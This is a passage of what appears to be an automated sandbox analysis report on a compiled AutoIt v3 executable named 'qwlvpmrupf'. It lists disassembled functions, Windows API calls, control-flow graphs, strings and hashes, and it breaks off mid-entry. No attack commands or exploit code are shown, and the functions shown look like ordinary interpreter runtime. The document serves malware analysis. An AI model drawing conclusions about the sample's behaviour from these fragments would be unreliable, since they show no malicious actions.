                                                  • Part of subcall function 00376E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00373B33,?,00008000), ref: 00376E80
                                                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00373C17
                                                • _wcslen.LIBCMT ref: 00373C96
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00373D81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 3350465876-3738523708
                                                • Opcode ID: a25fa10fef5c5b4d0c307be51029b5a68b80be6768cb6b402066e960f101f4aa
                                                • Instruction ID: 0832b33f4fb4bfeb8275fb055a5630c5b6f018863cb86e2cf366f0cd3967467a
                                                • Opcode Fuzzy Hash: a25fa10fef5c5b4d0c307be51029b5a68b80be6768cb6b402066e960f101f4aa
                                                • Instruction Fuzzy Hash: 9322C2314083419FC726EF24C851AAFBBF5BF95304F00891EF5899B2A2DB74DA48DB56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D5D$D5D$D5D$D5D$D5DD5D$Variable must be of type 'Object'.
                                                • API String ID: 0-3522529179
                                                • Opcode ID: c9273ca240143e27a0b0c35d0a52afdcf2cdd467d4b020b5fc857e223ba65b4f
                                                • Instruction ID: bdbadcf60cd189109000881db454e6913923f9dfe8b348d9264e3c4cf0183d1d
                                                • Opcode Fuzzy Hash: c9273ca240143e27a0b0c35d0a52afdcf2cdd467d4b020b5fc857e223ba65b4f
                                                • Instruction Fuzzy Hash: 1FC2AA75A00205DFCB26DF98C880BADB7F1BF09310F258169E949AB3A1D779ED41CB91
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 003815A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: D5D$D5D$D5D$D5D$D5DD5D
                                                • API String ID: 1385522511-811857780
                                                • Opcode ID: 9912794dd1568c0950d8e88cf8b5d98b6a5234851c7ba765e25f8d36d2c2036c
                                                • Instruction ID: ee402a13447d65e7cfde43a6985a8f41b4aae5668082d8cdf0e96fca27e542be
                                                • Opcode Fuzzy Hash: 9912794dd1568c0950d8e88cf8b5d98b6a5234851c7ba765e25f8d36d2c2036c
                                                • Instruction Fuzzy Hash: 93B2AD74A08300CFDB6AEF18C480A2AB7F5BF85700F25899DE9859B351D771ED85CB92

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2051 372a52-372a8b 2052 372a91-372aa7 mciSendStringW 2051->2052 2053 3b39f4-3b39f5 DestroyWindow 2051->2053 2054 372aad-372ab5 2052->2054 2055 372d08-372d15 2052->2055 2056 3b3a00-3b3a0d 2053->2056 2054->2056 2057 372abb-372aca call 372e70 2054->2057 2058 372d17-372d32 UnregisterHotKey 2055->2058 2059 372d3a-372d41 2055->2059 2062 3b3a0f-3b3a12 2056->2062 2063 3b3a3c-3b3a43 2056->2063 2071 3b3a4a-3b3a56 2057->2071 2072 372ad0-372ad8 2057->2072 2058->2059 2060 372d34-372d35 call 372712 2058->2060 2059->2054 2061 372d47 2059->2061 2060->2059 2061->2055 2067 3b3a1e-3b3a21 FindClose 2062->2067 2068 3b3a14-3b3a1c call 377953 2062->2068 2063->2056 2066 3b3a45 2063->2066 2066->2071 2070 3b3a27-3b3a34 2067->2070 2068->2070 2070->2063 2074 3b3a36-3b3a37 call 3e3c0b 2070->2074 2077 3b3a58-3b3a5a FreeLibrary 2071->2077 2078 3b3a60-3b3a67 2071->2078 2075 3b3a6e-3b3a7b 2072->2075 2076 372ade-372b03 call 37e650 2072->2076 2074->2063 2083 3b3a7d-3b3a9a VirtualFree 2075->2083 2084 3b3aa2-3b3aa9 2075->2084 2088 372b05 2076->2088 2089 372b3a-372b45 CoUninitialize 2076->2089 2077->2078 2078->2071 2082 3b3a69 2078->2082 2082->2075 2083->2084 2087 3b3a9c-3b3a9d call 3e3c71 2083->2087 2084->2075 2085 3b3aab 2084->2085 2091 3b3ab0-3b3ab4 2085->2091 2087->2084 2092 372b08-372b38 call 373047 call 372ff0 2088->2092 2089->2091 2093 372b4b-372b50 2089->2093 2091->2093 2094 3b3aba-3b3ac0 2091->2094 2092->2089 2096 372b56-372b60 2093->2096 2097 3b3ac5-3b3ad2 call 3e3c45 2093->2097 2094->2093 2100 372b66-372b71 call 37bd2c 2096->2100 2101 372d49-372d56 call 38fb27 2096->2101 2109 3b3ad4 2097->2109 2111 372b77 call 372f86 2100->2111 2101->2100 2112 372d5c 2101->2112 2114 3b3ad9-3b3afb call 39015d 2109->2114 2113 372b7c-372be7 call 372e17 call 3901a4 call 372dbe call 37bd2c call 37e650 call 372e40 call 3901a4 2111->2113 2112->2101 2113->2114 2140 372bed-372c11 call 3901a4 2113->2140 2120 3b3afd 2114->2120 2122 3b3b02-3b3b24 call 39015d 2120->2122 2128 3b3b26 2122->2128 2131 3b3b2b-3b3b4d call 39015d 2128->2131 2137 3b3b4f 2131->2137 2141 3b3b54-3b3b61 call 3d6d63 2137->2141 2140->2122 2146 372c17-372c3b call 3901a4 2140->2146 2147 3b3b63 2141->2147 2146->2131 2152 372c41-372c5b call 3901a4 2146->2152 2150 3b3b68-3b3b75 call 38bd6a 2147->2150 2155 3b3b77 2150->2155 2152->2141 2157 372c61-372c85 call 372e17 call 3901a4 2152->2157 2158 3b3b7c-3b3b89 call 3e3b9f 2155->2158 2157->2150 2166 372c8b-372c93 2157->2166 2164 3b3b8b 2158->2164 2167 3b3b90-3b3b9d call 3e3c26 2164->2167 2166->2158 2168 372c99-372caa call 37bd2c call 372f4c 2166->2168 2174 3b3b9f 2167->2174 2175 372caf-372cb7 2168->2175 2177 3b3ba4-3b3bb1 call 3e3c26 2174->2177 2175->2167 2176 372cbd-372ccb 2175->2176 2176->2177 2178 372cd1-372d07 call 37bd2c * 3 call 372eb8 2176->2178 2182 3b3bb3 2177->2182 2182->2182
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00372A9B
                                                • CoUninitialize.COMBASE ref: 00372B3A
                                                • UnregisterHotKey.USER32(?), ref: 00372D1F
                                                • DestroyWindow.USER32(?), ref: 003B39F5
                                                • FreeLibrary.KERNEL32(?), ref: 003B3A5A
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003B3A87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: 676d4a6f403870ca22004d01712286041c2303c1fa3617deb7ad40f13fec0042
                                                • Instruction ID: 7902a5bb6053f30df40af5e39e54a216f67e48d564555d5bc8228d9c3a63b1a1
                                                • Opcode Fuzzy Hash: 676d4a6f403870ca22004d01712286041c2303c1fa3617deb7ad40f13fec0042
                                                • Instruction Fuzzy Hash: 8FD17D31701222CFCB2AEF15C895B6AF7A4BF04704F1582ADE94A6B651CB34ED16CF44

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2190 3e874a-3e878c call 3b22f0 call 378e70 2195 3e878e-3e879c call 37c92d 2190->2195 2196 3e87a2 2190->2196 2195->2196 2204 3e879e-3e87a0 2195->2204 2198 3e87a4-3e87b0 2196->2198 2199 3e886d-3e891f call 378e70 call 37557e call 39d913 call 3993c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 2198->2199 2200 3e87b6 2198->2200 2235 3e8973-3e8984 call 37e650 2199->2235 2236 3e8921-3e892d call 3de387 2199->2236 2203 3e87ba-3e87c0 2200->2203 2206 3e87ca-3e87cf 2203->2206 2207 3e87c2-3e87c8 2203->2207 2204->2198 2210 3e87d9-3e87df 2206->2210 2211 3e87d1-3e87d4 2206->2211 2209 3e87d6 2207->2209 2209->2210 2213 3e8848-3e884a 2210->2213 2214 3e87e1-3e87e4 2210->2214 2211->2209 2217 3e884b-3e884e 2213->2217 2214->2213 2216 3e87e6-3e87e9 2214->2216 2219 3e87eb-3e87ee 2216->2219 2220 3e8844-3e8846 2216->2220 2221 3e8858 2217->2221 2222 3e8850-3e8856 2217->2222 2219->2220 2224 3e87f0-3e87f3 2219->2224 2225 3e883d-3e883e 2220->2225 2226 3e885c-3e8867 2221->2226 2222->2226 2228 3e87f5-3e87f8 2224->2228 2229 3e8840-3e8842 2224->2229 2225->2217 2226->2199 2226->2203 2228->2229 2231 3e87fa-3e87fd 2228->2231 2229->2225 2233 3e87ff-3e8802 2231->2233 2234 3e883b 2231->2234 2233->2234 2237 3e8804-3e8807 2233->2237 2234->2225 2247 3e8987-3e898b call 37bd2c 2235->2247 2236->2235 2248 3e892f-3e893a call 3de9c5 2236->2248 2240 3e8809-3e880c 2237->2240 2241 3e8834-3e8839 2237->2241 2240->2241 2242 3e880e-3e8811 2240->2242 2241->2217 2245 3e882d-3e8832 2242->2245 2246 3e8813-3e8816 2242->2246 2245->2217 2246->2245 2249 3e8818-3e881b 2246->2249 2255 3e8990-3e8998 2247->2255 2256 3e89cf 2248->2256 2257 3e8940-3e8967 GetFileAttributesW SetFileAttributesW 2248->2257 2253 3e881d-3e8820 2249->2253 2254 3e8826-3e882b 2249->2254 2253->2254 2258 3e899b-3e89af call 37e650 2253->2258 2254->2217 2259 3e89d3-3e89e5 call 3e9f9f 2256->2259 2260 3e8969-3e8971 SetCurrentDirectoryW 2257->2260 2261 3e89b1-3e89b3 2257->2261 2258->2255 2267 3e89ea-3e89ec 2259->2267 2260->2235 2265 3e89b5-3e89cd SetCurrentDirectoryW call 394d13 2261->2265 2266 3e8a02-3e8a0c SetCurrentDirectoryW 2261->2266 2265->2259 2266->2247 2267->2266 2269 3e89ee-3e89fb call 37e650 2267->2269 2269->2266
                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003E8907
                                                • SetCurrentDirectoryW.KERNELBASE(?), ref: 003E891B
                                                • GetFileAttributesW.KERNEL32(?), ref: 003E8945
                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 003E895F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8971
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E89BA
                                                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 003E8A0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile
                                                • String ID: *.*
                                                • API String ID: 769691225-438819550
                                                • Opcode ID: 97e0d1bcd92f4c4cb214d41f7873c448d6631b7b740353518a55110f50522ad7
                                                • Instruction ID: 9634844308a95df1b9f5b638cc042bf83e04b9ac9b6403c98b3c407ba749c953
                                                • Opcode Fuzzy Hash: 97e0d1bcd92f4c4cb214d41f7873c448d6631b7b740353518a55110f50522ad7
                                                • Instruction Fuzzy Hash: C381D572D043909FCB22EF56C444AAAB3E9BF84310F554A1EF88DDB291DB34D945CB52

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2355 3a90d5-3a90e5 2356 3a90ff-3a9101 2355->2356 2357 3a90e7-3a90fa call 39f656 call 39f669 2355->2357 2359 3a9469-3a9476 call 39f656 call 39f669 2356->2359 2360 3a9107-3a910d 2356->2360 2373 3a9481 2357->2373 2378 3a947c call 3a2b7c 2359->2378 2360->2359 2363 3a9113-3a913e 2360->2363 2363->2359 2366 3a9144-3a914d 2363->2366 2369 3a914f-3a9162 call 39f656 call 39f669 2366->2369 2370 3a9167-3a9169 2366->2370 2369->2378 2371 3a916f-3a9173 2370->2371 2372 3a9465-3a9467 2370->2372 2371->2372 2376 3a9179-3a917d 2371->2376 2377 3a9484-3a9489 2372->2377 2373->2377 2376->2369 2381 3a917f-3a9196 2376->2381 2378->2373 2384 3a9198-3a919b 2381->2384 2385 3a91b3-3a91bc 2381->2385 2386 3a919d-3a91a3 2384->2386 2387 3a91a5-3a91ae 2384->2387 2388 3a91da-3a91e4 2385->2388 2389 3a91be-3a91d5 call 39f656 call 39f669 call 3a2b7c 2385->2389 2386->2387 2386->2389 2392 3a924f-3a9269 2387->2392 2390 3a91eb-3a91ec call 3a3bb0 2388->2390 2391 3a91e6-3a91e8 2388->2391 2417 3a939c 2389->2417 2399 3a91f1-3a9209 call 3a2d58 * 2 2390->2399 2391->2390 2394 3a926f-3a927f 2392->2394 2395 3a933d-3a9346 call 3afc3b 2392->2395 2394->2395 2398 3a9285-3a9287 2394->2398 2408 3a9348-3a935a 2395->2408 2409 3a93b9 2395->2409 2398->2395 2402 3a928d-3a92b3 2398->2402 2425 3a920b-3a9221 call 39f669 call 39f656 2399->2425 2426 3a9226-3a924c call 3a97b4 2399->2426 2402->2395 2406 3a92b9-3a92cc 2402->2406 2406->2395 2413 3a92ce-3a92d0 2406->2413 2408->2409 2411 3a935c-3a936b GetConsoleMode 2408->2411 2415 3a93bd-3a93d5 ReadFile 2409->2415 2411->2409 2416 3a936d-3a9371 2411->2416 2413->2395 2418 3a92d2-3a92fd 2413->2418 2420 3a9431-3a943c GetLastError 2415->2420 2421 3a93d7-3a93dd 2415->2421 2416->2415 2422 3a9373-3a938d ReadConsoleW 2416->2422 2423 3a939f-3a93a9 call 3a2d58 2417->2423 2418->2395 2424 3a92ff-3a9312 2418->2424 2427 3a943e-3a9450 call 39f669 call 39f656 2420->2427 2428 3a9455-3a9458 2420->2428 2421->2420 2429 3a93df 2421->2429 2432 3a93ae-3a93b7 2422->2432 2433 3a938f GetLastError 2422->2433 2423->2377 2424->2395 2437 3a9314-3a9316 2424->2437 2425->2417 2426->2392 2427->2417 2434 3a945e-3a9460 2428->2434 2435 3a9395-3a939b call 39f633 2428->2435 2431 3a93e2-3a93f4 2429->2431 2431->2423 2442 3a93f6-3a93fa 2431->2442 2432->2431 2433->2435 2434->2423 2435->2417 2437->2395 2445 3a9318-3a9338 2437->2445 2448 3a93fc-3a940c call 3a8df1 2442->2448 2449 3a9413-3a941e 2442->2449 2445->2395 2460 3a940f-3a9411 2448->2460 2454 3a942a-3a942f call 3a8c31 2449->2454 2455 3a9420 call 3a8f41 2449->2455 2461 3a9425-3a9428 2454->2461 2455->2461 2460->2423 2461->2460
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7384d6e9990260a22935b928437768aae4199719fa9fc6122eba04064febc460
                                                • Instruction ID: 17ba905b72fe0fcad6de323b2e5cc507dbc092ec494a74cb2bf21222a85945a6
                                                • Opcode Fuzzy Hash: 7384d6e9990260a22935b928437768aae4199719fa9fc6122eba04064febc460
                                                • Instruction Fuzzy Hash: B5C1A074A043499FDF12DFA9C841BADBBB4EF0B310F19419AE914BB392C7349942CB65
                                                APIs
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00373236
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0037323E
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00373249
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00373254
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0037325C
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00373264
                                                  • Part of subcall function 0037318C: RegisterWindowMessageW.USER32(00000004,?,00372906), ref: 003731E4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003729AC
                                                • OleInitialize.OLE32 ref: 003729CA
                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 003B39E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID: (&D$0$D$@(D$$D
                                                • API String ID: 1986988660-2548488434
                                                • Opcode ID: 8fc55767ac0159b2639e76ad87fa0e3395f7c1336a78e7ef7a1808d12f79a718
                                                • Instruction ID: 2e9f34b398e5c68f97d578c59c7917877b123d9d8473e0bc3a090a2de20c1d51
                                                • Opcode Fuzzy Hash: 8fc55767ac0159b2639e76ad87fa0e3395f7c1336a78e7ef7a1808d12f79a718
                                                • Instruction Fuzzy Hash: 42719FB8911200AED399EF79AF656197AE0FB4A3047C0823AF108DB271EBF84545CF1C
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00373568
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00373589
                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 0037359D
                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 003735A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 68457fe59ada3aba9819243deb634c770bbb97edec194d373f6cb116ae7c4c33
                                                • Instruction ID: 88468b40e0c3851b1d6c8b1cc5836d94c37bb301c9af9c6b0fd4fdb512305516
                                                • Opcode Fuzzy Hash: 68457fe59ada3aba9819243deb634c770bbb97edec194d373f6cb116ae7c4c33
                                                • Instruction Fuzzy Hash: B8F01778A002957AE7211B636D08E372EBDDBC7F50B40003ABD04A71A0C2B90889DAB8
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003755EB,SwapMouseButtons,00000004,?), ref: 0037561C
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003755EB,SwapMouseButtons,00000004,?), ref: 0037563D
                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003755EB,SwapMouseButtons,00000004,?), ref: 0037565F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: 95ff094cac46116b35597169c93ce923b3c168b47eda69f2a7fbe5a8de753253
                                                • Instruction ID: c19630b52eb4520a6db1f7461e29c9edd7bc28e9d7459915206fbd1d14b44d4a
                                                • Opcode Fuzzy Hash: 95ff094cac46116b35597169c93ce923b3c168b47eda69f2a7fbe5a8de753253
                                                • Instruction Fuzzy Hash: 14117C75611608FFEB258FA4CC40EAF77BCEF44744F409469F809E7120D6B19E449764
                                                APIs
                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 003CE73D
                                                • FreeLibrary.KERNEL32 ref: 003CE763
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: AddressFreeLibraryProc
                                                • String ID: GetSystemWow64DirectoryW$X64
                                                • API String ID: 3013587201-2590602151
                                                • Opcode ID: bfdbb21536ef27e5785f03d0b7d9f6976630ea2cb88928ae5b0bb533fb3ee3cf
                                                • Instruction ID: 88c8406c6b4cdf02ebf933f79896f1187ae6da76c9b15e54241bbd0063a1aaa8
                                                • Opcode Fuzzy Hash: bfdbb21536ef27e5785f03d0b7d9f6976630ea2cb88928ae5b0bb533fb3ee3cf
                                                • Instruction Fuzzy Hash: 84E0E532C016119BD7731A604C48FA962286F10700F2504ADF881FA044DF78DC48878C
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,0040DC30), ref: 003DDABB
                                                • GetLastError.KERNEL32 ref: 003DDACA
                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 003DDAD9
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0040DC30), ref: 003DDB36
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                • Opcode ID: e98fae0206cccec10d31710d827d3dbc80692db1edae7a8597b118e81d87800e
                                                • Instruction ID: d1e4fabbeabba941ee1aefc71db3b0a2e31bf7ecc710408bde3fe7d06d3636b0
                                                • Opcode Fuzzy Hash: e98fae0206cccec10d31710d827d3dbc80692db1edae7a8597b118e81d87800e
                                                • Instruction Fuzzy Hash: 35219F329082019FC711DF34D9819AAB7E8EE55368F154A2FF4A9973A1D730D90ACB42
                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 003B4115
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                  • Part of subcall function 003739DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003739FD
                                                Strings
                                                Memory Dump Source
